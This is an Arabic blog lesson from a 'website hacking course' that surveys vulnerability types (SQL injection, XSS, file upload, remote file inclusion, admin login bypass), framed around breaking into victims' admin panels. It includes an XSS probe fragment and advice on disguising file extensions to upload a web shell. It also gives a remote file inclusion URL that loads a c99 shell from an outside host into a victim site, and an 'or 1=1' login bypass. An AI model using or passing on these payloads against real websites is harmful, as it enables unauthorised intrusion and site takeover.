اكتب ما تود البحت عنه و اضغط Enter
آخر الأخبار

الدرس (7) انواع الثغرات + حديث عنها .. من دورة اختراق المواقع 2015




المقدمه :

الحمد لله رب العالمين والصلاة والسلام على اشرف المرسلين سيدنا محمد اما بعد 

..


.. 

موضوعنا اليوم عن الثغرات ولكن قبل التحدث عن انواع ثغرات المواقع لا بد من ملاحظه 

ما هى الثغره ؟ هو خطأ برمجى يقع به المبرمج يمكننا من خلاله الوصول الى لوحة تحكم الموقع 

كيف يتم استغلال الثغره ؟ في الدرس القادم ستعلم كيف عمل ذلك 

كيفية البحث عن الثغره ؟ للبحث عن الثغرات تستطيع البحث يدويا او عن طريق مواقع ما وطرق البحث سهله جدا جدا 


انواع الثغرات او بعض انواعها 

لا اخفي عليكم متابعينى الكرام ان الثغرات كثيره ولن نعيد الكلام عن ثغرة اسكول فزاد الكلام عنها واظن الجميع قد شرحها وهو عن طريق الحقن 

ولكن ارجو الانتباه ان 33% من المواقع مصابه بهذه الثغره 

فلذلك سأعيد الكلام عنها ولكن بنقاط مختلفه .. هذه الثغره سهل استخدامها جدا وناجحه جدا ولكنها مقرفه بعض الشيء وهى بسبب الحقن وقد يدوم الحقن من 5 ال 10 ساعات او اكثر -_-

بس لازم نتعلم طرق استغلالها 

والشرح القادم سأقدم ذلك


ومن انواع هذه الثغرات ما يأتى :

 

1_ ثغرة XXS بهذه الثغره تستطيع عمل الكثير للوصول الى لوحة تحكم الموقع 

وبهذا الكود ’zer0o0-hacker’)</script>

تستطيع معرفة ان كانت الثغره تعمل داخل الموقع ام لا 

 وسنأتى بالشرح عنها قريبا 

...................................................................................

2_ ثغرات الرفع :::: Remote File Uploed 

 هذه الثغرات تمكننا من رفع ملف على الموقع كثغرات مراكز التحميل 

ولكن لا تعمل مع جميع مواقع التحميل وهى عن طريق رفع الشيل الخاص بك وعليك بخداع الموقع وتغيير الامتداد والحديث عنها كثير وناجحه بعض الشيء 

وسيأتى الكلام عنها ان كان يوجد وقت 

 ............................................................................................

3_ ثغرة -Remote File Inclusion | ثغرات فايل انكلود.

وهذه من افضل الثغرات من وجهة نظرى ومن مميزاتها انك تستطيع استغلال الثغره دون الانتظار لرفع الشيل والوصول الى ما تريد عن طريق اوامر لينكس مباشرة 

مثال 

http://www.site.com/qtronix.php?fox=http://www.sh3ll.org/c99.txt?

نشرحها.
www.site.com: موقع الضحية
qtronix.php?: اسم الملف المصاب بالثغرة.
fox=: المتغيير المصاب والذي سيتم وضع رابط الشل الي بامتداد txt عليه.
http://www.sh3ll.org/c99.txt?: هذا هو رابط الشل الي بامتداد txt, ويجب وضع علامة السؤال [؟] في نهاية رابط الشل لكى  يستعرض معك الشل ..

...........................................................................

4_ ثغرة : bypass admin control panal
هذه الثغرات تسمح لنا بتجاوز لوحة التحكم control panal الخاصه بأدمن الموقع . اي تخطي صفحة طلب الباسبورد والاسم المرخص لهم بدخول لوحة تحكم .:.
طريقة {{{{{ or 1=1}}}}}}}}}}} حسب الرموز التي تدخلها والرموز كثيرة جدا .:. او عن طريقة الدخول على اي ملف من ملفات المجلد من خلال السكربت

 

واخيرا وليس اخيرا فالثغرات كثيره جدا وطرق استغلالها اكثر 

فالله الموفق 

جميع الحقوق محفوظة © نقطة التمييز 2017

تصميم وبرمجة مصطفى زين